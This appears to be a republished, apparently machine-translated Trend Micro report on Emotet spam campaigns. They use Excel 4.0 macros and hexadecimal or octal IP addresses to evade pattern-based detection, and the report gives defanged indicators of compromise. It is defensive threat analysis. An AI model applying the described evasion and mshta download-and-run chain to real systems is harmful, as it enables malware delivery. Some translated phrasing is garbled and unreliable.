Trend Micro: Emotet Spam Abuses Unconventional IP Address Formats to Spread Malware

0

We have observed Emotet spam campaigns using hexadecimal and octal representations of IP addresses, which may escape detection through pattern matching. Both routines use social engineering techniques to trick users into enabling document macros and automating malware execution. Upon receiving these standards, operating systems (OS) automatically convert the values ​​to quadruple dotted decimal representation to initiate the request from the remote servers. Users and businesses are warned to detect, block and enable relevant security measures to avoid compromise when using Emotet for second stage delivery of malware such as TrickBot and Cobalt Strike.

Routine using hexadecimal IP addresses

The examples we found begin with a document attached to an email using Excel 4.0 macros, an outdated feature used to automate repetitive tasks in Excel that malicious actors have abused to spread malware. In this case, abuse of the feature allows the malware to run once the document is opened using the auto_open macro.

Figure 1. Document Attachment in Email Prompts Users to Enable Macros

The URL is masked with carets and the host contains a hexadecimal representation of the IP address. Using CyberChef, we converted the hexadecimal numbers to find the most commonly used dotted decimal equivalent, 193[.]42[.]36[.]245.

Figure 2. Using sliders for obfuscation

Figure 3. Converting hexadecimal numbers to dotted-decimal representation

When executed, the macro invokes cmd.exe > mshta.exe with the URL containing the hexadecimal representation of the IP address as an argument, which will download and execute an HTML Application Code (HTA) from the remote host.

Figure 4. Downloading and running an HTA code

Routine using octal IP addresses

Just like the sample hexadecimal representation, the document also uses Excel 4.0 macros to execute the malware once the document is opened and activated. The URL is also masked by carets, but the IP address contains an octal representation. We also used CyberChef to decode this IP address into a quadruple dotted format, 46[.]105[.]81[.]76.

Figure 5. Using similar techniques with the hexadecimal decimal routine but with an octal representation for obfuscation

Figure 6. Conversion of octal numbers to dotted decimal representation

As observed in the process tree, when executed, the macro also invokes cmd.exe > mshta.exe with the URL as an argument to download and execute an HTA code from the remote host.

Figure 7. Downloading and running an HTA file

Conclusion

Traces of Emotet were observed arbitrarily dropping Cobalt Strike beacons between November and December 2021. Earlier this year, however, operators became noticeably selective about which targets the beacons were dropped on. Evasion techniques like these could be seen as proof that attackers continue to innovate to thwart pattern-based detection solutions.

Additionally, the unconventional use of hexadecimal and octal IP addresses can lead to circumventing current solutions based on pattern matching. But along the same lines, the unusual command-line technique can be used as a detection opportunity, with security teams using filters as leverage that can be activated to treat these IP addresses as suspicious and associate them with software. malicious.

Indicators of Compromise (IOC)

SHA256

The description

Detections

e492f31ca20d99888b2434dcb4d9af1f93ed4c485b9bd2bc550ce8ae8021b9cd

Example of a hexadecimal IP address

Trojan.XF.HIDDBOOK.SMTH

3e9701129f13f13f7b873f55dc3d43d04cbd1dd3f85814270bb1b177394926b5

Example octal IP address

Trojan.XF.EMOTET.SMYXBLAA

URLs

193[.]42[.]36[.]245

46[.]105[.]81[.]76

Share.

Comments are closed.